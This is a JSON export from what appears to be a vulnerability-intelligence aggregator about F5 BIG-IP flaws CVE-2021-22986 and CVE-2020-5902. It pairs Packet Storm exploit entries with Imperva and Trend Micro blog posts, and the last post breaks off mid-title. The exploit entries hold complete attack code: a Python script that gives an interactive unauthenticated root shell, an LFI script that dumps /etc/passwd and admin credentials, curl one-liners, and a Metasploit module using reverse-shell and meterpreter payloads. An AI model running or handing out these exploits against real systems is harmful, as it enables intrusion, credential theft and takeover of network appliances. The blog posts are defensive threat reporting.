\n/tm/analytics/tcp-analytics/report-results/indexing \n/tm/analytics/tcp/generate-report/indexing \n/tm/analytics/tcp/report-results/indexing \n/tm/analytics/udp/generate-report/indexing \n/tm/analytics/udp/report-results/indexing \n/tm/analytics/vcmp/generate-report/indexing \n/tm/analytics/vcmp/report-results/indexing \n/tm/analytics/virtual/generate-report/indexing \n/tm/analytics/virtual/report-results/indexing \n/tm/shared/bigip-failover-state \n/tm/shared/sys/backup/indexing \n] \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162059/f5_icontrol_rest_ssrf_rce.rb.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-04-02T14:19:05", "description": "", "cvss3": {}, "published": "2021-04-02T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP 16.0.x Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22986"], "modified": "2021-04-02T00:00:00", "id": "PACKETSTORM:162066", "href": "https://packetstormsecurity.com/files/162066/F5-BIG-IP-16.0.x-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated) \n# Exploit Author: Al1ex \n# Vendor Homepage: https://www.f5.com/products/big-ip-services \n# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2 \n# CVE : CVE-2021-22986 \n \nimport requests \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nimport sys \n \n \ndef title(): \nprint(''' \n______ ____ ____ _______ ___ ___ ___ __ ___ ___ ___ ___ __ \n/ |\\ \\ / / | ____| |__ \\ / _ \\ |__ \\ /_ | |__ \\ |__ \\ / _ \\ / _ \\ / / \n| ,----' \\ \\/ / | |__ ______ ) | | | | | ) | | | ______ ) | ) | | (_) | | (_) | / /_ \n| | \\ / | __| |______/ / | | | | / / | | |______/ / / / \\__, | > _ < | '_ \\ \n| `----. \\ / | |____ / /_ | |_| | / /_ | | / /_ / /_ / / | (_) | | (_) | \n\\______| \\__/ |_______| |____| \\___/ |____| |_| |____| |____| /_/ \\___/ \\___/ \n \nAuthor:Al1ex@Heptagram \nGithub:https://github.com/Al1ex \n''') \n \ndef exploit(url): \ntarget_url = url + '/mgmt/shared/authn/login' \ndata = { \n\"bigipAuthCookie\":\"\", \n\"username\":\"admin\", \n\"loginReference\":{\"link\":\"/shared/gossip\"}, \n\"userReference\":{\"link\":\"https://localhost/mgmt/shared/authz/users/admin\"} \n} \nheaders = { \n\"User-Agent\": \"hello-world\", \n\"Content-Type\":\"application/x-www-form-urlencoded\" \n} \nresponse = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15) \nif \"/mgmt/shared/authz/tokens/\" not in response.text: \nprint('(-) Get token fail !!!') \nprint('(*) Tested Method 2:') \nheader_2 = { \n'User-Agent': 'hello-world', \n'Content-Type': 'application/json', \n'X-F5-Auth-Token': '', \n'Authorization': 'Basic YWRtaW46QVNhc1M=' \n} \ndata_2 = { \n\"command\": \"run\", \n\"utilCmdArgs\": \"-c whoami\" \n} \ncheck_url = url + '/mgmt/tm/util/bash' \ntry: \nresponse2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20) \nif response2.status_code == 200 and 'commandResult' in response2.text: \nwhile True: \ncmd = input(\"(:CMD)> \") \ndata_3 = {\"command\": \"run\", \"utilCmdArgs\": \"-c '%s'\"%(cmd)} \nr = requests.post(url=check_url, json=data_3, headers=header_2, verify=False) \nif r.status_code == 200 and 'commandResult' in r.text: \nprint(r.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', '')) \nelse: \nprint('(-) Not vuln...') \nexit(0) \nexcept Exception: \nprint('ERROR Connect') \nprint('(+) Extract token: %s'%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0])) \nwhile True: \ncmd = input(\"(:CMD)> \") \nheaders = { \n\"Content-Type\": \"application/json\", \n\"X-F5-Auth-Token\": \"%s\"%(response.text.split('\"selfLink\":\"https://localhost/mgmt/shared/authz/tokens/')[1].split('\"}')[0]) \n} \ndata_json = { \n\"command\": \"run\", \n\"utilCmdArgs\": \"-c \\'%s\\'\"%(cmd) \n} \nexp_url= url + '/mgmt/tm/util/bash' \nexp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15) \nif exp_req.status_code == 200 and 'commandResult' in exp_req.text: \nprint(exp_req.text.split('commandResult\":\"')[1].split('\"}')[0].replace('\\\\n', '')) \nelse: \nprint('(-) Not vuln...') \nexit(0) \n \nif __name__ == '__main__': \ntitle() \nif(len(sys.argv) < 2): \nprint('[+] USAGE: python3 %s https://<target_url>\\n'%(sys.argv[0])) \nexit(0) \nelse: \nexploit(sys.argv[1]) \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/162066/f5bigip16-exec.txt", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2020-07-28T17:51:18", "description": "", "cvss3": {}, "published": "2020-07-27T00:00:00", "type": "packetstorm", "title": "F5 Big-IP 13.1.3 Build 0.0.6 Local File Inclusion", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-27T00:00:00", "id": "PACKETSTORM:158581", "href": "https://packetstormsecurity.com/files/158581/F5-Big-IP-13.1.3-Build-0.0.6-Local-File-Inclusion.html", "sourceData": "`# Exploit Title: F5 Big-IP 13.1.3 Build 0.0.6 - Local File Inclusion \n# Date: 2019-08-17 \n# Exploit Author: Carlos E. Vieira \n# Vendor Homepage: https://www.f5.com/products/big-ip-services \n# Version: <= 13.1.3 \n# Tested on: BIG-IP 13.1.3 Build 0.0.6 \n# CVE : CVE-2020-5902 \n \n#!/usr/bin/env python \n \nimport requests \nimport sys \nimport time \nimport urllib3 \nimport json \nurllib3.disable_warnings() \n \nglobal target \n \ndef checkTarget(): \n \nr = requests.head(target + \"/tmui/login.jsp\", verify=False) \nif(r.status_code == 200): \nreturn True \nelse: \nreturn False \n \ndef checkVuln(): \n \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd\", verify=False) \nif(r.status_code == 200): \n \ndata = json.loads(r.text) \nif(len(data['output']) > 0): \nreturn True \nelse: \nreturn False \n \nelse: \nreturn False \n \ndef leakPasswd(): \nprint(\"[+] Leaking /etc/passwd from server\") \ntime.sleep(2) \nexploit('/etc/passwd') \n \n \ndef leakHosts(): \nprint(\"[+] Leaking /etc/hosts from server\") \ntime.sleep(2) \nexploit('/etc/hosts') \n \ndef leakLicence(): \n \nprint(\"[+] Leaking /config/bigip.license from server\") \ntime.sleep(2) \nexploit('/config/bigip.license') \n \ndef leakAdmin(): \n \nprint(\"[+] Leaking admin credentials from server\") \ntime.sleep(2) \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin\", verify=False) \nif(r.status_code == 200): \n \ndata = json.loads(r.text) \nif(len(data['output']) > 0 ): \nprint(data['output']) \nelse: \nprint(\"[X] Admin credentials not found\") \nelse: \nprint(\"[X] Fail to read file\") \n \n \ndef exploit(file): \n \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=\" + file, verify=False) \nif(r.status_code == 200): \ndata = json.loads(r.text) \nprint(data['output']) \nelse: \nprint(\"[X] Fail to read file\") \n \ndef memoryLeak(): \nprint(\"[!] Leaking tomcat process from server\") \ntime.sleep(2) \nr = requests.get(target + \"/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/proc/self/cmdline\", verify=False) \nif(r.status_code == 200): \ndata = json.loads(r.text) \nif(len(data['output'])>0): \nprint(\"Command: \" + data['output']) \n \ndef main(host): \n \nprint(\"[+] Check target...\") \nglobal target \ntarget = \"https://\" + host \n \ncheck = checkTarget() \nif(check): \nprint(\"[~] Target is available\") \n \nvuln = checkVuln() \nif(vuln): \nprint(\"[+] Target is vulnerable!\") \n \ntime.sleep(1) \nprint(\"[~] Leak information from target!\") \ntime.sleep(1) \nleakPasswd() \nleakHosts() \nleakLicence() \nleakAdmin() \nmemoryLeak() \nelse: \nprint(\"[X] Target is't vulnerable\") \n \nelse: \nprint(\"[x] Target is unavailable\") \n \n \nif __name__ == \"__main__\": \n \nif(len(sys.argv) < 2): \nprint(\"Use: python {} ip/dns\".format(sys.argv[0])) \nelse: \nhost = sys.argv[1] \nmain(host) \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158581/f5bigip1313006-lfi.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T08:52:38", "description": "", "cvss3": {}, "published": "2020-07-07T00:00:00", "type": "packetstorm", "title": "BIG-IP TMUI Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "PACKETSTORM:158333", "href": "https://packetstormsecurity.com/files/158333/BIG-IP-TMUI-Remote-Code-Execution.html", "sourceData": "`## RCE: \n \ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin' \n \n## Read File: \n \ncurl -v -k 'https://[F5 Host]/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd' \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158333/bigiptmui-exec.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-08T08:52:38", "description": "", "cvss3": {}, "published": "2020-07-07T00:00:00", "type": "packetstorm", "title": "F5 BIG-IP TMUI Directory Traversal / File Upload / Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-5902"], "modified": "2020-07-07T00:00:00", "id": "PACKETSTORM:158366", "href": "https://packetstormsecurity.com/files/158366/F5-BIG-IP-TMUI-Directory-Traversal-File-Upload-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \n \nRank = ExcellentRanking \n \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::Remote::HttpClient \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'F5 BIG-IP TMUI Directory Traversal and File Upload RCE', \n'Description' => %q{ \nThis module exploits a directory traversal in F5's BIG-IP Traffic \nManagement User Interface (TMUI) to upload a shell script and execute \nit as the root user. \n \nVersions 11.6.1-11.6.5, 12.1.0-12.1.5, 13.1.0-13.1.3, 14.1.0-14.1.2, \n15.0.0, and 15.1.0 are known to be vulnerable. Fixes were introduced \nin 11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, and 15.1.0.4. \n \nTested on the VMware OVA release of 14.1.2. \n}, \n'Author' => [ \n'Mikhail Klyuchnikov', # Discovery \n'wvu' # Analysis and exploit \n], \n'References' => [ \n['CVE', '2020-5902'], \n['URL', 'https://support.f5.com/csp/article/K52145254'], \n['URL', 'https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/'] \n], \n'DisclosureDate' => '2020-06-30', # Vendor advisory \n'License' => MSF_LICENSE, \n'Platform' => ['unix', 'linux'], \n'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64], \n'Privileged' => true, \n'Targets' => [ \n[ \n'Unix Command', \n'Platform' => 'unix', \n'Arch' => ARCH_CMD, \n'Type' => :unix_cmd, \n'DefaultOptions' => { \n'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' \n} \n], \n[ \n'Linux Dropper', \n'Platform' => 'linux', \n'Arch' => [ARCH_X86, ARCH_X64], \n'Type' => :linux_dropper, \n'DefaultOptions' => { \n'CMDSTAGER::FLAVOR' => :bourne, \n'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' \n} \n] \n], \n'DefaultTarget' => 0, \n'DefaultOptions' => { \n'SSL' => true, \n'WfsDelay' => 5 \n}, \n'Notes' => { \n'Stability' => [SERVICE_RESOURCE_LOSS], # May disrupt the service \n'Reliability' => [UNRELIABLE_SESSION], # Seems a little finicky \n'SideEffects' => [IOC_IN_LOGS, CONFIG_CHANGES, ARTIFACTS_ON_DISK] \n} \n) \n) \n \nregister_options([ \nOpt::RPORT(443), \nOptString.new('TARGETURI', [true, 'Base path', '/']) \n]) \n \nregister_advanced_options([ \nOptString.new('WritableDir', [true, 'Writable directory', '/tmp']) \n]) \n \n# XXX: https://github.com/rapid7/metasploit-framework/issues/12963 \nimport_target_defaults \nend \n \ndef check \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/fileRead.jsp'), \n'vars_post' => { \n'fileName' => '/etc/f5-release' \n} \n) \n \nunless res \nreturn CheckCode::Unknown('Target did not respond to check request.') \nend \n \nunless res.code == 200 && /BIG-IP release (?<version>[\\d.]+)/ =~ res.body \nreturn CheckCode::Safe('Target did not respond with BIG-IP version.') \nend \n \n# If we got here, the directory traversal was successful \nCheckCode::Vulnerable(\"Target is running BIG-IP #{version}.\") \nend \n \ndef exploit \ncreate_alias \n \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \n \ncase target['Type'] \nwhen :unix_cmd \nexecute_command(payload.encoded) \nwhen :linux_dropper \nexecute_cmdstager \nend \n \ndelete_alias if @created_alias \nend \n \ndef create_alias \nprint_status('Creating alias list=bash') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), \n'vars_post' => { \n'command' => 'create cli alias private list command bash' \n} \n) \n \nunless res && res.code == 200 && res.get_json_document['error'].blank? \nfail_with(Failure::UnexpectedReply, 'Failed to create alias list=bash') \nend \n \n@created_alias = true \n \nprint_good('Successfully created alias list=bash') \nend \n \ndef execute_command(cmd, _opts = {}) \nvprint_status(\"Executing command: #{cmd}\") \n \nupload_script(cmd) \nexecute_script \nend \n \ndef upload_script(cmd) \nprint_status(\"Uploading #{script_path}\") \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/fileSave.jsp'), \n'vars_post' => { \n'fileName' => script_path, \n'content' => cmd \n} \n) \n \nunless res && res.code == 200 \nfail_with(Failure::UnexpectedReply, \"Failed to upload #{script_path}\") \nend \n \nregister_file_for_cleanup(script_path) \n \nprint_good(\"Successfully uploaded #{script_path}\") \nend \n \ndef execute_script \nprint_status(\"Executing #{script_path}\") \n \nsend_request_cgi({ \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), \n'vars_post' => { \n'command' => \"list #{script_path}\" \n} \n}, 3.5) \nend \n \ndef delete_alias \nprint_status('Deleting alias list=bash') \n \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => dir_trav('/tmui/locallb/workspace/tmshCmd.jsp'), \n'vars_post' => { \n'command' => 'delete cli alias private list' \n} \n) \n \nunless res && res.code == 200 && res.get_json_document['error'].blank? \nprint_warning('Failed to delete alias list=bash') \nreturn \nend \n \nprint_good('Successfully deleted alias list=bash') \nend \n \ndef dir_trav(path) \n# PoC courtesy of the referenced F5 advisory: <LocationMatch \".*\\.\\.;.*\"> \nnormalize_uri(target_uri.path, '/tmui/login.jsp/..;', path) \nend \n \ndef script_path \n@script_path ||= \nnormalize_uri(datastore['WritableDir'], rand_text_alphanumeric(8..42)) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/158366/f5_bigip_tmui_rce.rb.txt", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "impervablog": [{"lastseen": "2021-04-06T10:29:57", "description": "On March 10th F5 published a [security advisory](<https://support.f5.com/csp/article/K02566623>) containing twenty one CVEs, the most critical one (CVE-2021-22986) can be exploited for unauthenticated remote code execution attacks. In the past week, several security researchers have reverse engineered the Java software patch published by BIG-IP and posted tweets and blogs with detailed POCs.\n\nAs a result, we observed multiple exploitation attempts against our customers in the last 5 days, while 90% of all occurred in the last 48 hours (March 21-22, 2021). This is probably due to the publication of a POC written in python, available in a [GitHub](<https://github.com/h4x0r-dz/RCE-Exploit-in-BIG-IP/blob/main/f5_rce.py>) repository.\n\nLooking at the client type of the requests, the vast majority of the attacks were classified as coming from automated software.\n\nSo far, Imperva research lab registered dozens of attacking IPs although the majority of attacks came from a handful of IPs indicating, once again, the usage of an automated software.\n\nThe most targeted industries are Education, Business, Retail and Financial Services, as we can see in the chart below:\n\nThe exploits that were published use different endpoints in the product to allow an unauthenticated user to execute commands using **root privileges**.\n\nWe observed two attack vectors that attempt to execute code on the vulnerable server. The first one is an attack chain that contains an SSRF attack that attempts to gain an authenticated session token as the first level, followed by remote command execution as the second level. Most of the indications of this attack observed by Imperva were pointed to the \u201c/mgmt/shared/auth/login\u201d URL. Another interesting behavior observed is an attacker that attempted to include the \u2018ping\u2019 command as a value in the \u2018FilePath\u2019 parameter, to many different websites, all of them were redirected to the same IP address hosted in Amazon, with nginx server installed with port 80 opened.\n\nThe second attack vector observed was a remote command execution (RCE), that targeted the \u201cmgmt/tm/util/bash\u201d URL, which allows an unauthenticated user to execute commands using the \u2018utilCmdArgs' parameter. In most of the attack attempts of this RCE observed by Imperva, the attacker tried to run \u201ccat /etc/passwd\u201d.\n\nIn several attack attempts, we saw requests containing nslookup to http://<random_domain>.burpcollaborator.net. The Burp Collaborator is a network service that Burp Suite uses when testing web applications for security vulnerabilities.\n\nThese attacks were detected as a new zero-day attack by [Imperva WAF](<https://www.imperva.com/products/web-application-firewall-waf/>) generic security controls. Imperva\u2019s research team has also added new dedicated rules to mitigate these vulnerabilities to block these attacks so Imperva WAF customers are protected Out-Of-the-Box.\n\nThe post [Attacks Spike Following The Disclosure Of CVE-2021-22986: F5 Networks BIG-IP iControl Remote Command Execution Vulnerability](<https://www.imperva.com/blog/attacks-spike-following-the-disclosure-of-cve-2021-22986-f5-networks-big-ip-icontrol-remote-command-execution-vulnerability/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-22T19:45:18", "type": "impervablog", "title": "Attacks Spike Following The Disclosure Of CVE-2021-22986: F5 Networks BIG-IP iControl Remote Command Execution Vulnerability", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986"], "modified": "2021-03-22T19:45:18", "id": "IMPERVABLOG:3D5A9B1B55D73BE6810D0DB036F8B83F", "href": "https://www.imperva.com/blog/attacks-spike-following-the-disclosure-of-cve-2021-22986-f5-networks-big-ip-icontrol-remote-command-execution-vulnerability/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T14:27:01", "description": "Imperva\u2019s report, [**The State of Vulnerabilities in 2020**](<https://www.imperva.com/resources/resource-library/reports/the-state-of-vulnerabilities-in-2020/>) has revealed that unlike in previous years, researchers observed a fall in the number of vulnerabilities last year, even as businesses were compelled to accelerate digital transformation processes due to the COVID-19 pandemic. Vulnerabilities are defined as the gaps or weaknesses that undermine an organization\u2019s IT security efforts, such as a firewall flaw that enables hackers into a network.\n\nThe overall number of new vulnerabilities in 2020 (23,006) was down by 2.04% compared to 2019 (23,485) and by 0.86% compared to 2018 (23,207).\n\nAccording to the report, the dominant root cause of vulnerabilities was [cross-site scripting](<https://www.imperva.com/learn/application-security/cross-site-scripting-xss-attacks/>) (XSS) with injection as the second-most dominant root cause. Drilling down into the report data, the researchers note that a large percentage of this appeared to be related to [SQL injection](<https://www.imperva.com/learn/application-security/sql-injection-sqli/>). While XSS was the dominant root cause of vulnerabilities, most of the attacks in 2020 were related to injection vulnerabilities rather than XSS. Only 15.68% of the attacks that Imperva registered were related to XSS. On the contrary, the injection vulnerability category appeared to be the attackers\u2019 \u201cfavorite\u201d with 44.75% of all attacks. After injection vulnerability, path traversal and local file include (LFI) attacks were the attackers\u2019 second \u201cfavorite\u201d with 24.83%.\n\nSocial media, in fact, echoed this finding with 75% of the top 20 most viral tweets being related to the leading attack category, injection and remote code execution. Researchers observed a high correlation between the chatter in social media and actual attacks. Analyzing tweets from Twitter, the two most trending vulnerabilities on social media belonged to CVE-2020-5902 and CVE-2020-3452 which were also the top vulnerabilities used by hackers in 2020.\n\nImperva researchers continued to see a constant growth of vulnerabilities in APIs (Application Programming Interfaces) in 2020, with WordPress the most popular platform in the content management system category. In the server side technologies category, the report indicates an increase in the number of vulnerabilities in applications or packages written in JavaScript for NodeJS.\n\nThe report also shows MySQL to be ahead of all other popular databases in terms of new vulnerabilities discovered in 2020, although 92.4% of these had an unknown exploit. This is likely because Oracle acquired MySQL and doesn\u2019t usually share technical details in its security reports. Additional analysis of bug bounty vulnerabilities revealed that almost 40% of them were ranked as Critical.\n\n### Vulnerabilities and cyber security attacks forecast for 2021\n\nGiven the degree to which APIs have become a necessary element for applications, Imperva researchers expect to see constant growth in the number of API vulnerabilities, although the rate of this growth is likely to decrease in 2021. The release of the OWASP API Security - Top 10 which standardizes the main threats in APIs will increase the awareness of security among developers and play a role in decreasing vulnerabilities.\n\nOld faithful injection and XSS vulnerabilities will remain a serious concern, despite greater awareness and the number of tools that check code for their presence. The reason for this is the direct impact of the exploitation of these vulnerabilities, as well as - in most cases - the lack of preconditions required to exploit them. Injection vulnerabilities may also lead to [supply chain attacks](<https://www.imperva.com/learn/application-security/supply-chain-attack/>) resulting in [PII](<https://www.imperva.com/learn/data-security/personally-identifiable-information-pii/>) data theft.\n\nThe number of vulnerabilities in third-parties will continue to grow, as major platforms and frameworks become more reliant on third-party plugins. These vulnerabilities may be the gateway to various supply chain attacks. WordPress has over 58,000 plugins, the NPM registry has almost 1.5 million packages for NodeJS, and PyPI has over 280,000 packages for Python. In addition, there are also main package registries for Java and Ruby-based projects. As the community continues to grow, and without code standards or restrictions to publish a plugin or a package, they remain the weakest point in an application, making them the sweet spot for attackers.\n\nDownload the full report [here](<https://www.imperva.com/resources/resource-library/reports/the-state-of-vulnerabilities-in-2020/>).\n\n### Protect your apps from attack with a Web Application Firewall (WAF)\n\nOne of the best solutions for protecting against web application database vulnerabilities is to deploy a [Web Application Firewall](<https://www.imperva.com/products/web-application-firewall-waf/>) (WAF) and Data Monitoring & Protection. The solution may be either on-premise, in the cloud, or a combination of both depending on your needs, infrastructure, and more. Start a [free trial](<https://www.imperva.com/free-trial/>) today.\n\nThe post [Despite COVID-19 pandemic, Imperva reports number of vulnerabilities decreased in 2020](<https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/>) appeared first on [Blog](<https://www.imperva.com/blog>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-22T19:42:10", "type": "impervablog", "title": "Despite COVID-19 pandemic, Imperva reports number of vulnerabilities decreased in 2020", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-02-22T19:42:10", "id": "IMPERVABLOG:6F67E97EF55C748CBFEE482E85D4751A", "href": "https://www.imperva.com/blog/despite-covid-19-pandemic-imperva-reports-number-of-vulnerabilities-decreased-in-2020/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "seebug": [{"lastseen": "2021-07-24T16:14:43", "description": "", "cvss3": {}, "published": "2021-03-12T00:00:00", "type": "seebug", "title": "F5 Networks \u591a\u4e2a\u6f0f\u6d1e\uff08CVE-2021-22986\u3001CVE-2021-22987\u3001CVE-2021-22988\u3001CVE-2021-22989\u3001CVE-2021-22990\u3001CVE-2021-22991\u3001CVE-2021-22992\uff09", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-22991", "CVE-2021-22992"], "modified": "2021-03-12T00:00:00", "id": "SSV:99156", "href": "https://www.seebug.org/vuldb/ssvid-99156", "sourceData": "", "sourceHref": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "trendmicroblog": [{"lastseen": "2020-08-07T08:03:49", "description": "![](https://blog.trendmicro.com/wp-content/uploads/2018/03/Week-in-Security-News-Logo_RGB-300x300.jpg)\n\nWelcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, read about how Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion. Also, learn about how the Vermont Department of Taxes may have been exposing taxpayer data for more than three years.\n\nRead on:\n\n[**Ransomware is Still a Blight on Business**](<https://blog.trendmicro.com/ransomware-is-still-a-blight-on-business/>)\n\n_Ransomware has been with us for years, but only really became mainstream after the global WannaCry and NotPetya incidents of 2017. Now mainly targeting organizations in lieu of consumers, and with increasingly sophisticated tools and tactics, the cybercriminals behind these campaigns have been turning up the heat during the COVID-19 pandemic. That\u2019s why we need industry partnerships like No More Ransom._\n\n[**Garmin Outage Caused by Confirmed WastedLocker Ransomware Attack**](<https://www.bleepingcomputer.com/news/security/garmin-outage-caused-by-confirmed-wastedlocker-ransomware-attack/>)\n\n_Wearable device maker Garmin shut down some of its connected services and call centers last week following what the company called a worldwide outage, now confirmed to be caused by a WastedLocker ransomware attack._ _Garmin's product line includes GPS navigation and wearable technology for the automotive, marine, aviation, marine, fitness, and outdoor markets._\n\n[**Trend Micro Launches Cloud Solution for Microsoft Azure**](<https://datacenternews.us/story/trend-micro-launches-cloud-solution-for-microsoft-azure>)\n\n_Trend Micro announced the availability of its Trend Micro Cloud One \u2013 Conformity offering to Azure customers, helping global organizations tackle misconfigurations, compliance challenges and cyber-risks in the cloud. The company also achieved the CIS Microsoft Azure Foundation Security Benchmark, certifying that the Conformity product has built-in rules to check for more than 100 best practices in the CIS framework._\n\n[**Ensiko: A Webshell with Ransomware Capabilities**](<https://blog.trendmicro.com/trendlabs-security-intelligence/ensiko-a-webshell-with-ransomware-capabilities/>)\n\n_Ensiko is a PHP web shell with ransomware capabilities that targets platforms such as Linux, Windows, macOS, or any other platform that has PHP installed. The malware has the capability to remotely control the system and accept commands to perform malicious activities on the infected machine. It can also execute shell commands on an infected system and send the results back to the attacker via a PHP reverse shell._\n\n[**\u2018Boothole\u2019 Threatens Billions of Linux, Windows Devices**](<https://www.scmagazine.com/home/security-news/boothole-threatens-billions-of-linux-windows-devices/>)\n\n_A newly discovered serious vulnerability \u2013 dubbed \u201cBootHole\u201d \u2013 with a CVSS rating of 8.2 could unleash attacks that could gain total control of billions of Linux and Windows devices. Security firm Eclypsium researchers released details this week about how the flaw can take over nearly any device\u2019s boot process._\n\n[**Mirai Botnet Exploit Weaponized to Attack IoT Devices via CVE-2020-5902**](<https://blog.trendmicro.com/trendlabs-security-intelligence/mirai-botnet-exploit-weaponized-to-attack-iot-devices-via-cve-2020-5902/>)\n\n_Following the initial disclosure of two F5 BIG-IP vulnerabilities in early July, Trend Micro continued monitoring and analyzing the vulnerabilities and other related activities to further understand their severities. Based on the workaround published for CVE-2020-5902, Trend Micro found an IoT Mirai botnet downloader that can be added to new malware variants to scan for exposed Big-IP boxes for intrusion and deliver the malicious payload._\n\n[**Hackers Stole GitHub and GitLab OAuth Tokens from Git Analytics Firm 